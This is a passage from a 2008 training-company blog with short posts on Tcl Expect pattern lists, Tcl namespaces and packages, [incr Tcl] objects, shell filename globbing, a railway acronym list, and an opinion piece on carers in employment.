Opentalk - Open Source
Save the Train - TransWilts Train Service
First Great Western Coffee Shop - Rest of First Great Western area
I look forward to your - human, real - comments on those places!
[update] 3 days into the "no comment" and you can see the effect on our mailboxes - around 250 emails a day aren't coming to my mailbox and the whole of our domain graph - left - shows the effect
See here for our live email traffic graph, and the sourse code behind it.
Posted by gje at 11:24 PM | Comments (0)
Related topics: via article database
February 04, 2008
Expecting a item from a list of possibles
There are times (and they're quite frequent!) that I'm asked a good question that's so good it's worth sharing the answer. Actually, that makes up a fair proportion of my inspirations for this spot, such as today's.
In Expect - the command line automation tool of the Tcl language - you can tell the program to wait until it receives a particular string, or you can code a series of strings (and globs and regular expressions) that you want it to wait for. But what if you don't want to [b]code[/b] the things it's to wait for - you want to read them from a file or otherwise vary them at run time?
I have two solutions - both standard computing techniques, but both techniques which may be outside the experience of the newer user to Tcl and Expect.
Option 1 Build the list of options into a regular expression, and expect from that - using expect_out(0,string) to identify which of the options was actually matched.
See Complete example
Option 2 Build a complete expect parameter into a string, and then pass that into expect. You'll need to use an eval to do this so that your variable is interpreted.
See Complete example
Here's an example of one of those scripts in action:
dolphin:~ graham$ expect wuff
dog cow
0: I got a dog
1: I got a cow
and also a giraffe and a hen and
3: I got a hen
so on we go
unil dolphin:~ graham$
where I was looking for any one of a series of 3 letter animals built into a list:
set possible {cat dog cow pig hen}
Posted by gje at 11:01 PM | Comments (0)
Related topics: via article database
February 03, 2008
Railway Acronyms and Abbreviations
It's only when someone asked me "what does THAT mean" when I realised how much jargon I was speaking - how many abbreviations and three letter acronyms had crept into my talk on the Save the Train and First Great Western forums that I help with. So with assistance I have drawn up a list ... and if you want to know what is meant by
SPAD ...
Bustitution ...
OOU ...
Mystex ...
MKM ...
KISS ...
SDO ...
SX ...
MTLS ...
... look no further than my railway acronym list
Posted by gje at 08:52 PM | Comments (0)
Related topics: via article database
February 02, 2008
Tcl - learning how to use namespaces, packages and libraries together
Tcl supports both packages (which allow code to be loaded from libraries at run time) and namespaces (which allow for procs and variables to be grouped together to allow you to avoid conflicts as you use code from lots of different sources). Strictly speaking, the two sets of facilities are independent but in practice they're used together, with the name of the package and the name of the namespace usually being the same.
Having covered both topics independently on yesterday's course, I went on to write a short new example that shows how they work together and I've added the course code of that example to our web site - this is an example that shows you a lot in a few lines!
Source code of the main program - here
Source code of the packages it loads - here and here
Sample output:
Dorothy:jtc grahamellis$ tclsh dinpack
Copyright Well House Consultants, 2008
Copyright Well House Consultants, 2008
You need a 11.0kgs bird if it's a chicken
You need a 13.9kgs bird if it's a goose
You need a 13.9kgs bird if it's imported
Dorothy:jtc grahamellis$
This subject covered on our Public Tcl Course. There's a lot to cover on that course, so it's quite a short section. Also covered on private courses at our centre which are tailored to meet your needs (Full list of modules on Tcl). For larger groups, we can also run courses at you own office
Posted by gje at 09:16 AM | Comments (0)
Related topics: via article database
Useful link: Tcl training
Object Oriented Tcl
Object Oriented Tcl ([incr-Tcl]) is darned good - but it's only a requirement in a small proportion of the Tcl Training Courses that I give. So it was with real pleasure that I spent some time yesterday writing an example in front of my class in the Nottingham area to show them just how fabulous it is!
The source code of the example I came up with is here, and I have added a whole lot of comments in to it this morning so that readers can see a "hello world" type example of how Tcl implements classes, objects, inheritance, encapsulation, security matters, polymorphism and the rest. And for readers who would like a deeper explanation, you'll find ongoing links ... or I would love to see you on a course!
P.S. Yes - we can train you whether or not you have prior OO experience; our training resources include modules that overview straightforward objects, talk about how objects can be build from other objects and introduce you to OO design principles so you can start making the very best of the facilities
Here's what you get when you run the code I've linked to above.
Dorothy:stuffing grahamellis$ tclsh exv
East Midlands !!!!! place1 - 960 40
First Great Western !!!!! place2 - 1250 25
Connex !!!!! place3 - 0
FGW !!!!! place4 - 5264 94
Dorothy:stuffing grahamellis$
Posted by gje at 08:45 AM | Comments (0)
Related topics: via article database
Useful link: Tcl training
Selecting file names in a shell - one word or another
If you want to select all file names that include the words "cat" or "dog" in them with file name matching, you can do so using curly braces - that's supported by most modern shells as part of what is known as "globbing".
Here's an example - I've just been copying images off my digital camera and I wanted all files from 28th January, 31st January and 1st February - so file names starting P128, P131 and P201, and this is what I wrote:
cp /Volumes/Untitled/DCIM/100OLYMP/P{128,131,201}* .
Sometimes, there is confusion between square brackets and curly braces in file name matching. If I had written
[128,131,201]
I would have been looking for any ONE character from the list in the brackets - so that's a 0 1 2 3 8 or comma (and the specification of the comma 1 and 2 several times would have shown that I didn't realise what I was doing. And if I had written
[128][131][201]
then I would have been looking for a 1 2 or 8 followed by a 1 or 3 (or 1!) followed by s 2 a 0 or a 1
Oh - want to see one of the pictures?
Nottingham at Night - City Centre
Posted by gje at 07:29 AM | Comments (0)
Related topics: via article database
February 01, 2008
Carers at work - court case changes
It was a slow news day yesterday with no obvious top story, so the "top story" that I happened across in Nottingham perhaps didn't even make it onto other people's radar.
It concerns a lady who had to rush off from work from time to time because she's a carer. She felt that her employers weren't giving her due time / respect for those responsibilities, and were making discriminatory comments too, to the extent that she felt she had been constructively dismissed. And the big news is that she has just won her case in the European courts, who concluded that the same ground rules that apply to disabled people should apply to carers. The report went on to comment that there are around 6 million carers in this country, and many of them don't take employment because of the problems they have in sharing themselves between their employer and the person / people they look after.
I'm not a legal expect, I don't know the case, and in any case I've only seen it as seen through the eyes of one particular TV channel and its pundits. And on the show, they were casting it with a positive spin ... and yet, listening to the lady who had won the case talking, I found myself thinking "good for you and your Dad ... but pity your employer when you keep dashing off, and pity your employer's customers if you're in a customer facing role with no-one standing by to take over just in case". I came away from the watching the show ... not only reminded that carers need a gallon of consideration but also how - in the wrong role - a carer can provide a headache for an employer who needs to be certain that his roles are staffed.
Regular readers will know that I do a lot of campaigning work on public transport issues, so let me draw a comparison in that field. The driver of a train that's running from London to Bristol hears that his elderly Mum needs help as he approaches Chippenham. Oh well - "Mum comes first" now, so he hops out of the can when the train has pulled to a halt and jumps into the train going the other way, to get back up to Swindon where she lives. Me thinks there are going to be a lot of unhappy and delayed people - there won't be a spare driver, and I'm sure that the First group won't want to go back to having a driver and a second man in the cab who is qualified to take over in such an instance.
It effects us too at Well House Consultants and, yes, I know our staff will be reading it. We have several members of our little team who are carers, and depending on the person or people cared for that can effect to a varying degree. Indeed, I have been a working carer but 'only' at a minimum care needed level. In a customer service company such as ours, having people with caring experience is actually a huge plus - it means that they are very much more used to handling the personal relationships involved, the unplanned events (and perhaps crises). So we treasure them - but there are disbenefits too. We already have backup plans / people we can call on if we have to and we're currently strengthening our team and adding further robustness ... but as a 24 hour operation it's always going to be an issue if we loose our breakfast person unexpectedly at 07:15, or our check in person at 21:15 on Sunday night.
So I await to see what the effect of this court case - picked up by just a proportion of the media so far - is going to have on business and working life. And I wait with some trepidation, not really on the current work situation / team we have, but rather for the future where personell and situations change.
Posted by gje at 11:53 PM | Comments (0)
Related topics: via article database